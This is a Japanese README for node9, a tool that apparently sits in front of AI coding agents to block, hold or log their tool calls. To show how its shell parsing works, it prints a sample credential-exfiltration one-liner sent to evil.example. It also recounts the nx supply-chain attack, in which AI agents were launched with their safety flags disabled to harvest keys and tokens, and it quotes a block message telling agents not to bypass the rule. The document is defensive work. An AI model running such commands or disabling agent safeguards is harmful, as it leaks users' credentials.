
AIエージェントのためのIAM。Claude Code、Codex、Gemini、Cursor、および任意のMCPサーバーが実行を許可される操作を設定し、リスクのあるアクションを実行前にレビューし、すべてのアクションを記録に残します。
クレデンシャルジェイル · シークレットとPII · 破壊的なgit、SQL、シェルはレビューのために保留 · MCPツールのピン留め · ネットワークエグレス許可リスト · ループブレーカー · 12のエージェントにまたがる単一の記録
Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · 任意のMCPサーバー で動作します。
左があなたのエージェント、右がnode9です。エージェントが行うすべてのツール呼び出しは、
実行前にチェックされます: 許可されて記録されるか、あなたの承認のために保留されるか、ブロックされるかです。
ここでのエージェントは --dangerously-skip-permissions で起動されており、それでもnode9が決定します。
node9 monitor: live tool calls, decisions, shields and score
brew tap node9-ai/node9 && brew install node9 # macOS / Linux
npm install -g node9-ai # any platform
次に、任意のプロジェクトで:
node9 init # finds your agents and MCP servers and puts node9 in front of every tool call
node9 posture # scores this machine 0-100: what a compromised agent could read, reach and run
node9 login # optional: adds this machine to a shared dashboard
Node.js 22+ が必要です。
init が製品のすべてです。 フックを書き込み、クレデンシャルジェイルと常時有効なルールを
オンにし、即座に適用を開始します。マシンの外には何も出ず、アカウントも不要です。
login は適用に何も追加しません。 マシンをワークスペースに接続し、チームが全員の
ラップトップとCIにまたがる単一の記録を確認し、ポリシーを集中的に設定し、保留中のアクションを
ダッシュボードやSlackから承認できるようにします。これをスキップしてもnode9はまったく同じように、
単独で、オフラインで動作します。node9 logout で再び切断され、ローカルの適用は動き続けます。
2025年8月、nx ビルドツールの侵害された
リリースが、開発者のマシンにすでにインストールされているAIコーディングエージェントを探し、
それらを独自の安全フラグをオフにして (--dangerously-skip-permissions、--yolo、
--trust-all-tools) 実行し、SSHキー、クラウドクレデンシャル、ウォレットファイルを列挙して
そのリストをディスクに書き込むポストインストールスクリプトを出荷しました。このスクリプトは
結果を被害者自身のGitHubアカウント内の公開リポジトリにプッシュしました。エージェントが
言われたとおりに動いていたマシンから、千を超える有効なGitHubトークンが漏洩し、クラウド
クレデンシャル、npmトークン、そして約20,000のファイルも一緒に漏れました。
エージェントは攻撃者ではありませんでした。エージェントはツールであり、それとファイルの間に 何も立ちはだかっていませんでした。node9のゲートはそれらのフラグの一つではありません: フック内で動作し、保留にしたアクションは、エージェントがパーミッションをスキップして 起動されたとしても保留のままです。
node9はエージェントとそれが呼び出すすべてのツールの間に位置します。クレデンシャルジェイル
(~/.ssh、~/.aws、.env ファイル、秘密鍵) はデフォルトで有効で、それらのパスの読み取りは
実行されません。エージェントは停止され、理由を伝えられ、決定があなたに届きます:
NODE9: Action blocked by security policy.
INSTRUCTIONS:
- Do NOT retry this exact command or attempt to bypass the rule.
- Pivot to a non-destructive or read-only alternative.
- Inform the user which security rule was triggered and ask how to proceed.
コマンドはテキストとしてマッチされるのではなく、シェルASTとして解析されるため、読み取りを
ラップしても役に立ちません。echo $(cat ~/.aws/credentials | base64) | curl -d @- https://evil.example
は echo ではなく ~/.aws/credentials の読み取りとして判定されます。
node9はゲートです。保留にされたアクションはあなたを待つ間は実行されず、あなたが決して 答えなければブロックされたままです。それ以外はすべて許可され、記録に書き込まれます。
それが行わないこと: デフォルトであるエグレス制御がオフの場合、curl -d @~/.aws/credentials
のようにファイルを直接ネットワークに渡すコマンドは、そのファイルの読み取りとして扱われません。
node9 egress protect は宛先もゲートし、シェルコマンドのみを対象とします。
以下のどれもアカウントを必要とせず、何もアップロードしません。
npx node9-ai scan # every past agent session on this machine
npx node9-ai scan-repo node9-ai/agent-security-demo # a public repo with a real, hijackable agent workflow
gh attestation verify cli.js --repo node9-ai/node9-proxy # every release artifact is signed
node9 scan scorecard
各行は一つの機能で、それを文書化したページが付いています。ドキュメントがリファレンスであり、 このファイルは地図です。
| クレデンシャルジェイル | ~/.ssh、~/.aws、.env、秘密鍵はシェルだけでなくすべてのツールからブロックされます | docs |
| 常時有効なルール | 破壊的なgit、WHERE のないSQL、curl | bash、無許可の sudo を、設定なしで | docs |
| シークレットとPII | AWSキー、GitHubとStripeのトークン、PEMキー、カードやSSNの形状を、任意のツール引数で検出し、さらにエージェントが書き戻したもののバックグラウンドスキャンも実施 | docs |
| サービス別シールド | Postgres、MongoDB、Redis、AWS、Kubernetes、Docker、GitHub、ファイルシステム向けの厳選されたルールパック | docs |
| インラインレビュー | 保留にされたアクションは、エージェントの会話内で、またはチームの承認者を通じてあなたに確認します | docs |
| エグレス許可リスト | シェルコマンドがデータを送信できる先をゲート、デフォルトはオフ | docs |
| MCPゲートウェイ | 任意のMCPサーバーをラップし、各ツールを認可し、ツール定義をピン留めしてサーバーが背後で変更できないようにします | docs |
| サンドボックス | カーネルのエグレス許可リストとスコープ付きマウントを備えたコンテナでエージェントを実行 | docs |
| ポスチャスコア | このマシンがどれだけ露出しているか、各所見を修正するコマンドとともに | docs |
| リポジトリスキャン | 部外者があなたのシークレットを保持するエージェントをハイジャックできるワークフローを、CIまたはCLIから発見 | docs |
| セッション履歴 | node9がインストールされる前に、すべてのエージェントがこのマシンで何をしたかを読む | docs |
| ライブモニターとレポート | ターミナルダッシュボード、およびコスト、ツール、ブロック、ブラスト半径のウィンドウ表示サマリー | docs |
CLIと設定の完全なリファレンス: node9.ai/docs。 各レイヤーがどのように組み合わさるか: how it works。
背景となる読み物で、単独で成立するように書かれています。各ページはnode9が対象としないことを述べています。
uses: node9-ai/node9-proxy@v2、同じエンジンで毎回のPRをゲートしますnode9 Pro はガバナンスロック、SAML/SSO、集中監査エクスポート、VPCデプロイを追加します。node9.ai をご覧ください。
Apache-2.0
Built with ☕ and healthy paranoia.
| スキルピン留め | セッション間でのインストール済みClaudeスキルとプラグインのSHA-256検証 | docs |
| カナリアクレデンシャル | 流出の試みが起きたことを証明する、仕込まれた偽のキー | docs |
| Python SDK | CLIだけでなく、任意のPythonエージェントを統制 | docs |